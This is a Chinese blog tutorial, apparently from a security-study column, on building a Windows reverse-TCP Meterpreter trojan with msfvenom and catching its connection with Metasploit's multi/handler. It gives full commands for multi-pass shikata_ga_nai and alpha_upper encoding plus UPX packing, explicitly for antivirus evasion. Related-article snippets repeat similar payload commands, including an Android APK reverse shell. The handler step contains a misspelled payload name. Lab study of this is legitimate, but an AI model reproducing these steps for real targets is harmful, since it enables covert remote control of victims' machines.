利用msfvenom生成木马程序

最新推荐文章于 2024-05-11 11:31:04 发布
最新推荐文章于 2024-05-11 11:31:04 发布
阅读量1.8w 收藏 18
点赞数 5
分类专栏: 网络攻防

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳:upx -5 /root/Desktop/acn.exe

结果:

说明:  -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证

沧_海_笑
关注
  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf生成木马攻击android手机
afei001
03-21 6619
实验环境 攻击机:kali IP:192.168.43.5 靶机:oppor9st 生成木马攻击android手机 1.在kali上生成反弹木马 root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk [...
使用msfvenom生成木马
Sylon的博客
08-27 3496
msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,...
Metasploit——msfvenom免杀木马
迷风小白
07-26 1万+
利用Metasploit中的msfvenom模块生成木马 先来msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等 -p, --paylo...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3343
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
msfvenom介绍
最新发布
weixin_46483815的博客
05-11 1870
主要介绍msfvenom 和一些实验
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 5362
msfvenom生成木马教程
Metasploit(一)
weixin_45778886的博客
10-31 7817
Metasploit 开启监听 msfconsole -q:快速打开 use exploit/multi/handler:使用侦听模块 show options:查看模块配置 set LHOST 本地IP:设置监听IP set LPORT 端口:设置端口 set payload windows/meterpreter/reverse_tcp:设置payload run/exploit 生成后门 msfvenom -h :查看帮助 msfvenom -l formats:查看可用文件类型 msfveno
msfvenom生成木马利用
zzlx123的博客
12-23 2259
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题。 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来解决。 0x00 关闭kali 0x01 点击编辑此虚拟机 0x02 将此处改为使用物理驱动器 0x03 再次开启虚拟机,等开启后选择安装Tools 0x04 他会自动进行安装,进入系统后打开文件...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
ThePayloadGhostv2:生成util msfvenom
03-26
的有效负载幽灵 您必须解压缩Images.zip文件,然后将其移动到Images文件夹中的路径:/ usr / share。 您之前应该已经对该文件夹授予了权限。... msfvenom payloads but with a very curious end -f Face
柠檬:简单的MSFVenom有效负载生成
02-14
柠檬 一个简单的MSFVenom有效载荷生成器 安装 git clone https://github.com/spicesouls/lemon cd lemon bash setup.sh python3 lemon.py
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom Payload 生成命令详解 MSFVenom 是 Metasploit Framework 中的一个组件,用于生成 Payload, Payload 是攻击者在攻击目标系统时使用的恶意代码。MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac...
Msfvenom建立后门程序指令及开启监听
Dreamsi_zhang的博客
08-13 7515
一、场景介绍
MSF生成木马及木马的简单使用
爱喝水的仙人树的博客
11-03 8816
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
生命在于学习——MSF初体验(三)
易水哲的博客
10-27 1553
MSF的笔记记录(三)
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 5200
msf
Metasploit framework, msf,Msfvenom,详细学习实验使用
m0_73960954的博客
04-17 403
p windows/meterpreter/reverse_tcp:指定payload类型为windows 系统下运行的反向TCP连接的meterpreter。利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等。Msfvenom生成Payload→msfconsole开启监听→运行Payload →获得控制。Msfvenom生成Payload→msfconsole开启监听→运行Payload →获得控制。
msfvenom 生成windows的exe木马
06-02
生成Windows的exe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter/reverse_tcp`是使用Meterpreter反向TCP连接的payload。`LHOST`是攻击者的IP地址,`LPORT`是攻击者监听的端口号。`-f exe`指定输出为exe文件,`> payload.exe`将输出重定向到一个名为payload.exe的文件中。 在生成的exe文件中包含了一个Meterpreter shell,可以用于远程控制目标系统。请注意,使用这种工具进行攻击是非法的,仅用于测试和教育目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值